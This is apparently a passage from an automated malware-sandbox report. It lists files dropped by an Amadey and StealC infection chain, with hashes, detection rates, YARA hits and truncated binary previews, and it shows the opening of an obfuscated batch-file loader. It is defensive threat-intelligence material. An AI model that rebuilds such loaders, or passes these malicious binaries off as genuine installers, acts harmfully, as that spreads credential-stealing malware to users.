Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pLAZbVgk7u.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\PureSyncInst[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9697280
Entropy (8bit):	6.380034919499369
Encrypted:	false
SSDEEP:	98304:5oc97+epo/AB/Tb08yNYQbdt51OhWtn8bt:b7yZlCk6b5
MD5:	366EB232CCB1D3D063E8074F8C4B529F
SHA1:	13E30AC58CFC74CB05EDAF0074EB09927AB5A9FA
SHA-256:	33D866C385C3D05981986F7E3D56EAC4966821813D216670D37AA7AF7C30D62C
SHA-512:	0A9C2ACBF9EF27345EFEADDA579FEA582B3299F96078B9A2959BAD5E87A0E7840949518FD905C82CB49B8ED604D93B404FDF85A11D71DE1E1BA3DBA9C0ABAB6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b...............6E..........c.......p....@..........................0...........@.....................................L...............................<....................................................................................text...h4E......6E................. ..`.rdata..H.D..PE...D..:E.............@..@.data..../...p...@...T..............@....idata..L...........................@....reloc..<...........................@..B.symtab..............b.................B.rsrc................d..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].exe

Download File

Process:	C:\Users\user\1000238002\Amadeus.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7596943
Entropy (8bit):	7.996920598127695
Encrypted:	true
SSDEEP:	196608:91O0kfZSviqnAcb/748eiXAv7vUD02IKY98oyH+d1ns0hrJK8yP:3O0kfZS9dcWAbU02ImHCrJK8y
MD5:	14A56F81287D1E037FC6405247C31D20
SHA1:	7648BC39A1D198BC115E5871466FD4478F70B175
SHA-256:	A8B4BC268063265EBA47D7325DBC3F118045C24478D740D3D69C245872ADE20A
SHA-512:	DBD0E1EF97B5C8DD2D2D78B823140863406046CC735A1AC62EDEF04FA7AB6F9D9644B62CBA40637D404016ACCECB06AAB6D3C56C7A27DAE05978CF9DA8C42D0E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	435200
Entropy (8bit):	6.5238833830985
Encrypted:	false
SSDEEP:	6144:31YnIct+B6NxMYE4+Sx9SY5pkUM7LOM/9HtlcyKZrr02e7wufA5oVt1ZuWu1KBF/:0IGxJECSYCLTxKZn1e7C5oVnZuWu3p
MD5:	CED97D60021D4A0BFA03EE14EC384C12
SHA1:	7AF327DF2A2D1E0E09034C2BDF6A47F788CEC4E4
SHA-256:	9E06EED4E1237FFDC84F0FF666FBE4B39E1BD2C60BD542870F7E1BFB10555951
SHA-512:	AF0A02DAA759010A1EDFC78F14C5FE321C10802D0B9DF55B515FE501114AF0835A05BBD5DD5E2167B4B1F39BB6DA787343BF9141D5F811113F71749741B47811
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f..................................... ....@.......................................@.................................\|#...................................M......8...................\|..........@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...\|f...@...4... ..............@....rsrc................T..............@..@.reloc...M.......N...V..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\BitcoinCore[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10481152
Entropy (8bit):	6.549113701782075
Encrypted:	false
SSDEEP:	98304:Zk8Moeo9VZ4odf8Fn8U/J1vD3NSPUv3KWQSy+Bk:e8Moeo9VZLf8hvRlfKkhBk
MD5:	304A5A222857D412CDD4EFFBB1EC170E
SHA1:	34924C42524CA8E7FCC1FC604626D9C5F277DBA2
SHA-256:	D67FB52973C445A3488A9D6A9A9FF3EBEBB05B1C0E853CEBFA8BBA1A5953F0D6
SHA-512:	208B39436B520E909EB8262F68314DCB93852EA5F00A1D4CE8BD682DD5E20AD313E65FF293C8062BFED95FFE101F6EAD3D7DA4886E779031101329A3764B855F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f..........".......]..&B.....`.].......@..............................0.......................@............... ...............`g......pf..P...0q.../..@l.0.............g...............................g.(....................f.......f.F....................text.....].......]................. ..`.data.........].......].............@....bss....,.....e..........................idata...P...pf..R...ze.............@....didata.F.....f.......e.............@....edata.......`g......\f.............@..@.tls.........pg..........................rdata..m.....g......^f.............@..@.reloc........g......`f.............@..B.pdata..0....@l.......k.............@..@.rsrc...../..0q.../...o.............@..@.............0.....................@..@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\gh941[1].bat

Download File

Process:	C:\Users\user\1000238002\Amadeus.exe
File Type:	DOS batch file, ASCII text, with very long lines (5544), with CRLF line terminators
Category:	dropped
Size (bytes):	4812845
Entropy (8bit):	6.009406126936787
Encrypted:	false
SSDEEP:	49152:VsHyVGgYnVUWsh4R8nfE9ezZ+Y23ckBK7KZaAKnsJJptM0Qo+VuiyP+UhigWL9U:Q
MD5:	6DD566198BD137EC693B778E4F1CCEFF
SHA1:	F1FA0E35C3BC5659098481A163A3AB5F789CAFC9
SHA-256:	55B5257DC71C8B9731C693FD2C4D6A5BF8F9D67D5B71D64C2990A5C97CAE9351
SHA-512:	659A00703C0BB43299B99E84671ECD6B7C09F491568AA0362B52618C90624064D2EAE8599872BFCAA94B05A7DC8B0B7A849A4DFDCEBD69DA386D3BCDEC6B8E05
Malicious:	false
Preview:	@echo off..%^%@%BdCBxCMHpAqOxpHWzUbMNlisYJZECRZLhEOBLhqdQORUSXnOJpyKWyvqUjCODifyAEGTAgkrEXVYtozavlVmspOJiyGBEBAIJstorunDegfZCxWFKCssnSglPXKczJMcwnpaUlJbXshl%%^%e%OgLBbRcjivQmhytJkevucDpiVKzSquVLUbaQZBxRJTnRyONMprMnLRhlRCFqsjSOAfsfyDKJGDKjqxJhXMDZHHZcUPZwVhzzazrtvHoMHdHigXVuTysFGTgTgplIEnNyeljQfqMqyQrEZR%%^%c%XUEDxPTTgtynfwFiupjdVOeoCLbhPCBTosoOZKqJkrcxHdGUSIXpPNbiPqaLNMdEREYNhQjJZATDLHHzfhohEmdBrfZIKEVyoyFcfTMcznppUyxhJAGFxVZFAxvcRAZvEvoncEumvmIrWOGSHRZjYpaszaBIxJlYoULzjkfeguklnIIMQCuZBQwovVOccMOLbJdcdhJxMUcDeOfQr%%^%h%SUolxxxwdnwdcuFzkEFGJITXnGOTjGQXKnUTwPlFEGdvbISIYFDBlLgjbrYRJEmxxysPALdvsZbcEyVEOfUEcoLZhKSeQuVZuGYCqchmBijlJdFDwucDJHuiNtHQSYEXdbIXzsoLYIcTfzpdepIwssqMmPPWvrtDEliHvHdefqFbEAcneELCqhFLLVLKCrqGozpU%%^%o%HIwmDqbMoiLNBSQGQmxFwVzWtBNaYNflhWwVoqMQEYxNZWbzzaxnRpVLiATcCbOBcAFFwUrAzGbxyMWwAoAYpStSaKNOwJnCkVKzqvdEIXNknymwDxCoBQmkgNEMhDdQtymDbxfekVpsfjECxrkZhZbuJzt%%^% %QrxfTXRPlJugrydGATfWjboQseIuxSUCdCnTxkzhrPrNXeIIVuTPuwtPcHMPoxrtPScOkjiquXFuKBSovaycYehGiyRQxJTUxYYfbTxLmDuwRZeB

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\runtime[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1411961
Entropy (8bit):	7.906312664956289
Encrypted:	false
SSDEEP:	24576:39O/bmU++vQu1TL9yJ5d2m8y7i1HlcoGpJ042jJpUeBk2h:3k/X+75dAyMGDP2dpUYXh
MD5:	046EBD7E0F619F33DE609EA3F126B0D3
SHA1:	37A0B634955EB29F9BC7D3D434838CD729BB7E17
SHA-256:	BF554462C091219488A1A53FFF22213DF8D9530FA6FF0F59033B0C9EE9173555
SHA-512:	39AFA534B862F9FAEBB4AA1FF4144A7D53F62ADFD389531F75BDF10865FE8D846E79B3138EC90F2E9D4EB92A72E7A856F0C7BE857A892A54EB2F2503F3030D10
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@...........................H......)....@.................................4........0G.O....................?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc...O...0G..P..................@..@.reloc...2....H..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\caesium-image-compressor[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6827008
Entropy (8bit):	6.401984123995157
Encrypted:	false
SSDEEP:	98304:IMPSPpVsMvHP2jkUQQauq2HBw77g0OYK:QpVyQ
MD5:	297FA8C27084D876F6699D121F9C06FA
SHA1:	2CE4110EBD75D61111A7BC1674F9E2D95B48571E
SHA-256:	AB42E51949918D17A582FB5A4C614C335616703F41AB8E71AD1ECE652E33F521
SHA-512:	D4319DA7596224BC9A62AD3A27907FB57A36BEF210916120E51CEFC31AA5BACB2ABA852C0E6A9188632377139704C92329E6D628789491976175A5D6DCED02B6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........@g.............../..........,........`...@...........................k.......i...@...................................g.L.....j.......................g..c..................................................`.`..............................text...H./......./................. ..`.rdata....0.../...0.../.............@..@.data...`.....`.. ....`.............@....idata..L.....g.......d.............@....reloc...c....g..d....d.............@..B.symtab.......j......@g................B.rsrc.........j......Bg.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\crypted[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	322048
Entropy (8bit):	7.985128056067976
Encrypted:	false
SSDEEP:	6144:d/vtLE/OOyVWU4MaqmF5N5KtkuDuPH8AVZG0QMMRhgO+sPnxl:ddo/OOyFXptkusHZLGlRhV+sPnj
MD5:	6134586375C01F97F8777BAE1BF5ED98
SHA1:	4787FA996B75DBC54632CC321725EE62666868A1
SHA-256:	414BECB8AABD4E8C406E84DF062BEE1A45CFFA334AE30022078CFA71DA9E330D
SHA-512:	652ED16D96B5700F105C2BAB8E7258F167BC1615B6397BE7340C08DF7C977842844326E07FDEF677AECFAF07263F99BB7968C9FC926E90E5A33D2ED793F8436B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f................................. ........@.. .......................@......._....`.................................X...S............................ ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...................................................................B...(..\|=C5H..........<6..2.......&...+.3..*....g^.c..F1..u....p.(C...:..(..S+..?.EV...\.K..........x...M.r..=62`.~B5=......rQ..-]@m...1wL6RH......T..Z.+.....\|....6....iP".g.....,..d.l....b....$?=s.jL...l.N.A.B......<<.Y.5...........s.T..<....]....M&R\|.......P.E:j....Q.N9r"...,....N.uT..Y..r.Y...........M.9...I..`.5............H........e..c..:[.d2{....{n9.9u....)b.S............b.1.9

C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
